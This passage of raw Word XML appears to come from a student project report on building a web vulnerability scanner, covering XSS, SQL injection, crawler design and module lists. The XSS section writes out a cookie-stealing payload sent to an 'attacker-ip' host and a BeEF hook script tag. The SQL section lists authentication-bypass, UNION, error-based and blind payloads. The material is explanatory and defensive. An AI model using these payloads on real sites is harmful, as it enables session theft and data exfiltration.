            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Understanding the topic</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>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field of web application security and vulnerability scanning may include many technical terms and concepts that could be new. As soon as the project is allocated to the team, all members should carefully review the project to:</w:t>
      </w:r>
    </w:p>
    <w:p>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Identify all terms and phrases that are not familiar or that are application-specific.</w:t>
      </w:r>
    </w:p>
    <w:p>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Understand the logical flow of events in the application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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 xml:space="preserve">Cross - Site Scripting (XSS) : </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Cross Site Scripting (XSS) is a vulnerability allowing an attacker to provide arbitrary JavaScript to a web page which is then be served to unsuspecting visitors of the page and run in their browser. There are three variants of this vulnerability: reflected XSS, stored (or “persistent”) XSS, and DOM XSS. In reflected XSS, an HTTP request causes JavaScript to be run on the resulting page. If this is a get request, the malicious code can be obfuscated to avoid suspicion, and the link can then be shared in phishing attacks to run code on victim’s browsers. This can occur whenever a user supplied value appears somewhere in the resulting page. In persistent XSS, JavaScript can be submitted to a page which is stored on the website indefinitely. Any user visiting the page unknowingly runs the malicious code provided previously. This is possible anywhere input is shown to all users of a site — common examples are comment or review forms. In DOM XSS, the malicious code is not part of the raw HTML of our page, but instead is loaded into the DOM at parse time - for example, JavaScript can be included in the URL, and if the code that runs as a result evaluates document.URL at run-time, the malicious code will be executed without it appearing on the page. This is a niche method for exploiting XSS and nowadays is prevented by the browser, and so we are not concerned with its detection. XSS attacks can be used to steal information from or to control the victim’s browser. One of the most common attacks is cookie stealing, in which an attacker provides a payload such as &lt;img s r c=” h t t p : / / a t t a c k e r −i p / ”+document . c o o k i e /&gt; and then sets up a local web server to listen for incoming HTTP requests. Whenever this payload runs on a victim’s browser, an HTTP request is made to the attacker’s server which includes the cookies from the browser, and so the attacker can record the cookies to be able to log in as the victim at a later date. Much more complex attacks can also be run even by low skilled hackers, or “script kiddies”, due to the availability of websites such as xss-payloads which provide ready to run payloads, covering attacks such as keylogging and forcing a malicious file to be downloaded. Frameworks such as BeEF  also allow for many attacks to be run easily, by providing a “hook” script that turns all victim browsers into “zombies” that can be forced to run any of over 300 readily available payloads at any time. This can be injected into a vulnerable site with a payload as simple as &lt;s c r i p t s r c=” h t t p : / / a t t a c k e r −i p : 3 0 0 0 / hook . j s ”&gt;&lt;/ s c r i p t &gt; which the BeEF framework provides for the user, alongside some example sites to test it out on. http://www.xss-payloads.com/  To prevent XSS, extensive filtering needs to be put in place on user input. It is advisable to use existing XSS filtering functions provided by web frameworks, as it is easy to miss an attack vector when implementing one’s own filtering. OWASP provides cheat sheets for preventing XSS, aiding website developers, as well as evading filters that prevent XSS for the benefit of penetration</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>testers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>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SQL Injection :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>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SQL Injection (SQLi) is a critical security vulnerability that occurs when an attacker can manipulate the SQL queries an application makes to its database. This happens when user inputs are not properly sanitized and are directly included in SQL statements. Attackers exploit this by injecting malicious SQL code into the input fields, which is then executed by the database.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A typical SQLi payload might look like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>' OR '1'='1';--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, which can be used to bypass authentication. When inserted into a login form, the query might transform from:</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rPr>
        <w:t>SELECT * FROM users WHERE username = 'admin' AND password = 'password';</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to SELECT * FROM users WHERE username = '' OR '1'='1';--' AND password = 'password';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>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Other common payloads include:</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Union-based SQLi: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'; UNION SELECT null, username, password FROM users;--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> This exploits the SQL UNION operator to combine the results of the original query with results from another query, potentially leaking sensitive data.</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Error-based SQLi: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>' AND 1=CONVERT(int, (SELECT @@version));--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> This forces the database to produce an error, which can reveal information about the database version, schema, or other details.</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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQLi: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>' OR 1=1;--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>' OR 1=2;--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> This technique involves sending payloads that produce different responses based on true/false conditions, allowing the attacker to infer information from the application's behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Crawling </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>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The web crawler begins by loading the given start page from the user. It then repeatedly finds URLs and forms on the current web page, adding all found URLs to to explore and storing the Locators representing the forms for later use. The crawler uses a breadth first search,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>implemented by using a deque as the to explore queue and storing the URLs already seen in a set called explored. The use of a set allows for constant time lookup and insert, which are the two operations required during crawling. Python does not provide a queue structure, and hence a deque is used for to explore, ignoring the additional functionality provided. The crawler allows for both a maximum depth to be set, as well as a maximum time. To allow the depth to be limited, the point in the queue where the depth of pages being explored changes is tracked. This is done by appending the current depth after all URLs at that depth: appending 17“1” to the initial set of URLs, then upon finding an integer in the queue, add one and append to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">the end of the list if it does not indicate that the maximum depth has been reached. There are two methods to limit the execution time of a process in Python: through Signals, which throw an exception after a given period, or by running the process in another thread and limiting the execution of this thread. Python signals can be ignored, notably by a Request waiting for a reply, whereas thread joins always force the thread to terminate and hence time limiting has been implemented with threads. The web crawler was implemented with Python Requests and Beautiful Soup, as Requests provides a fast HTTP request interface and Beautiful Soup allows simple parsing and querying of the HTML result. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420"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Finding Pages </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:lef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zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">To locate URLs in a web page, the crawler looks in various places for potential URLs and attempts to form them into URLs. As the crawler parses from HTML, many paths are not absolute URLs but paths relative to the current URL, and so they must be parsed into absolute paths for the crawler to be able to request them. The crawler first uses a URL regular expression to attempt to find URLs in the page source, which finds all absolute links that may not necessarily be in the other searched locations. The crawler then gathers the href attributes of all “a” tags (hyperlinks), as well as the actions (submit-to pages) from “form” tags. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420"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Finding Inputs </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">All possible get and post requests publicly available are given as either forms with a get or post method, or as a URL with the get request encoded into it. For forms, all form tags in the page are obtained, then their children searched for different inputs. The crawler searches for input, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>text-area</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, button, select and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>data-list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> tags, then gathers a default value from each where it is given and creates a locator representing this information. For selects and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>data-lists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, it is required to search their children for an option tag to be able to gather a default value. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc19827"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Proposed Modules:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>User Interface (UI) Module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Crawler Module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Injection Module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:leftChars="0" w:hanging="360" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>XSS Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440" w:leftChars="0" w:hanging="360" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Payload Management Module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc43339139"/>
      <w:bookmarkStart w:id="43" w:name="_Toc21679"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Modular break-up of the system</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>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Identify the various modules in the system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>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List them in the right hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>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Identify their priority of development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc2407"/>
      <w:bookmarkStart w:id="45" w:name="_Toc43339140"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Process logic for each module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:p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For every module, the process logic should be identified so that an outline is ready. The process logic may be clarified in case there are any doubts or problems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
